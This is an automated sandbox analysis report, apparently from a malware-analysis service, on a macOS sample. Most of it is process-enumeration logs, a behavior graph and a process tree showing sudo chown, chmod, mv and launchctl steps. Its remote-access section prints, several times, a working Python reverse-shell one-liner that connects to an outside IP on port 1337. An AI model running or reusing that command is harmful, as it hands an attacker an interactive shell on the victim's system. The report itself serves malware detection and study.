Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.263 -> queries PID 263Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.262 -> queries PID 262Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.261 -> queries PID 261Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.260 -> queries PID 260Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.259 -> queries PID 259Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.258 -> queries PID 258Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.257 -> queries PID 257Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.256 -> queries PID 256Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.255 -> queries PID 255Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.253 -> queries PID 253Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.251 -> queries PID 251Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.250 -> queries PID 250Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.249 -> queries PID 249Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.248 -> queries PID 248Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.246 -> queries PID 246Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.245 -> queries PID 245Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.237 -> queries PID 237Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.235 -> queries PID 235Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.234 -> queries PID 234Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.231 -> queries PID 231Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.230 -> queries PID 230Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.228 -> queries PID 228Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.225 -> queries PID 225Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.222 -> queries PID 222Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.215 -> queries PID 215Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.214 -> queries PID 214Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.213 -> queries PID 213Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.212 -> queries PID 212Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.209 -> queries PID 209Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.208 -> queries PID 208Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.206 -> queries PID 206Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.205 -> queries PID 205Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.204 -> queries PID 204Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.203 -> queries PID 203Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.201 -> queries PID 201Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.200 -> queries PID 200Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.199 -> queries PID 199Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.197 -> queries PID 197Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.196 -> queries PID 196Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.195 -> queries PID 195Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.193 -> queries PID 193Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.192 -> queries PID 192Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.191 -> queries PID 191Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.190 -> queries PID 190Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.189 -> queries PID 189Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.188 -> queries PID 188Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.179 -> queries PID 179Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.175 -> queries PID 175Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.171 -> queries PID 171Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.170 -> queries PID 170Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.167 -> queries PID 167Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.161 -> queries PID 161Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.160 -> queries PID 160Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.158 -> queries PID 158Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.156 -> queries PID 156Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.155 -> queries PID 155Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.153 -> queries PID 153Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.151 -> queries PID 151Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.121 -> queries PID 121Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.120 -> queries PID 120Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.119 -> queries PID 119Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.118 -> queries PID 118Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.114 -> queries PID 114Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.113 -> queries PID 113Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.112 -> queries PID 112Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.111 -> queries PID 111Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.110 -> queries PID 110Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.109 -> queries PID 109Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.108 -> queries PID 108Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.106 -> queries PID 106Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.105 -> queries PID 105Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.104 -> queries PID 104Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.103 -> queries PID 103Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.101 -> queries PID 101Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.98 -> queries PID 98Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.97 -> queries PID 97Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.95 -> queries PID 95Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.94 -> queries PID 94Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.93 -> queries PID 93Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.92 -> queries PID 92Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.91 -> queries PID 91Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.90 -> queries PID 90Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.89 -> queries PID 89Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.87 -> queries PID 87Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.84 -> queries PID 84Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.83 -> queries PID 83Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.81 -> queries PID 81Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.80 -> queries PID 80Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.79 -> queries PID 79Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.74 -> queries PID 74Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.73 -> queries PID 73Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.70 -> queries PID 70Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.69 -> queries PID 69Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.67 -> queries PID 67Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.66 -> queries PID 66Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.65 -> queries PID 65Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.64 -> queries PID 64Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.62 -> queries PID 62Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.60 -> queries PID 60Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.58 -> queries PID 58Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.57 -> queries PID 57Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.56 -> queries PID 56Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.54 -> queries PID 54Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.53 -> queries PID 53Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.1 -> queries PID 1Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.558 -> queries PID 558Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.549 -> queries PID 549Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.547 -> queries PID 547Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.543 -> queries PID 543Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.541 -> queries PID 541Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.540 -> queries PID 540Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.515 -> queries PID 515Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.513 -> queries PID 513Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.512 -> queries PID 512Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.510 -> queries PID 510Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.509 -> queries PID 509Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.473 -> queries PID 473Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.465 -> queries PID 465Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.456 -> queries PID 456Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.430 -> queries PID 430Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.429 -> queries PID 429Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.419 -> queries PID 419Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.418 -> queries PID 418Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.398 -> queries PID 398Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.396 -> queries PID 396Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.388 -> queries PID 388Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.381 -> queries PID 381Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.371 -> queries PID 371Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 561)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 553)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 555)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 556)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 559)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 561)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 562)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 564)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 565)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 567)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 568)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 571)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /var/root/script.sh (PID: 570)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 572)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 572)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 574)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 574)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Remote Access Functionality:

barindex
Creates a reverse shell via PythonShow sources
Source: /usr/bin/pythonPython command: python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonPython command: python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])Jump to behavior
Source: /usr/bin/pythonPython command: python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonPython command: python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])Jump to behavior
Writes files containing IP addresses of contacted hosts (e.g. command and control server)Show sources
Source: global traffic and dropped filesIP 185.243.115.230 found in file: /private/tmp/script.shJump to dropped file


Runtime Messages

Command:/Users/henry/Desktop/g70Ei8kMg7
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 56289 Sample: g70Ei8kMg7 Startdate: 03/07/2018 Architecture: MAC Score: 60 42 185.243.115.230, 1337 LEASEWEB-NLNetherlandsNL unknown 2->42 44 Writes files containing IP addresses of contacted hosts (e.g. command and control server) 2->44 46 Creates a reverse shell via Python 2->46 8 mono-sgen32 g70Ei8kMg7 2 2->8         started        11 xpcproxy script.sh 2->11         started        signatures3 48 Detected TCP or UDP traffic on non-standard ports 42->48 process4 file5 40 /private/tmp/script.sh, Bourne-Again 8->40 dropped 13 g70Ei8kMg7 sudo 8->13         started        16 g70Ei8kMg7 sudo 8->16         started        18 g70Ei8kMg7 sudo 8->18         started        26 9 other processes 8->26 20 bash python Python 11->20         started        22 bash python Python 11->22         started        24 bash sleep 11->24         started        process6 signatures7 50 Executes the "sudo" command used to execute a command as another user 13->50 28 sudo chown 13->28         started        30 sudo chmod 16->30         started        32 sudo mv 18->32         started        52 Reads process information of other processes 26->52 34 sudo mv 26->34         started        36 sudo chown 26->36         started        38 sudo launchctl 26->38         started        process8

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

cam-macmac-stand

Startup

  • system is mac1
  • mono-sgen32 (PID: 552 PPID: 505 MD5: 8910349f44a940d8d79318367855b236)
  • g70Ei8kMg7 (PID: 552 PPID: 505 Overlayed Process Image: mono-sgen32 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • g70Ei8kMg7 (PID: 553 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 553 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 554 PPID: 553 MD5: 60ac5909d06d86e22aace3a863b13690)
      • chown (PID: 554 PPID: 553 Overlayed Process Image: sudo MD5: cc600d309dc91e491f52c51e0b1821ec)
    • g70Ei8kMg7 (PID: 555 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 555 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 555 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 556 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 556 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 557 PPID: 556 MD5: 60ac5909d06d86e22aace3a863b13690)
      • chmod (PID: 557 PPID: 556 Overlayed Process Image: sudo MD5: 30e3e10a3e7ad9adfd37662b2e9b4f8a)
    • g70Ei8kMg7 (PID: 558 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 558 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 558 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 559 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 559 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 560 PPID: 559 MD5: 60ac5909d06d86e22aace3a863b13690)
      • mv (PID: 560 PPID: 559 Overlayed Process Image: sudo MD5: 7f791dd4bef08d618fece911d6e3398a)
    • g70Ei8kMg7 (PID: 561 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 561 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 561 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 562 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 562 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 563 PPID: 562 MD5: 60ac5909d06d86e22aace3a863b13690)
      • mv (PID: 563 PPID: 562 Overlayed Process Image: sudo MD5: 7f791dd4bef08d618fece911d6e3398a)
    • g70Ei8kMg7 (PID: 564 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 564 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 564 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 565 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 565 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 566 PPID: 565 MD5: 60ac5909d06d86e22aace3a863b13690)
      • chown (PID: 566 PPID: 565 Overlayed Process Image: sudo MD5: cc600d309dc91e491f52c51e0b1821ec)
    • g70Ei8kMg7 (PID: 567 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 567 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 567 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 568 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 568 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 569 PPID: 568 MD5: 60ac5909d06d86e22aace3a863b13690)
      • launchctl (PID: 569 PPID: 568 Overlayed Process Image: sudo MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
    • g70Ei8kMg7 (PID: 571 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
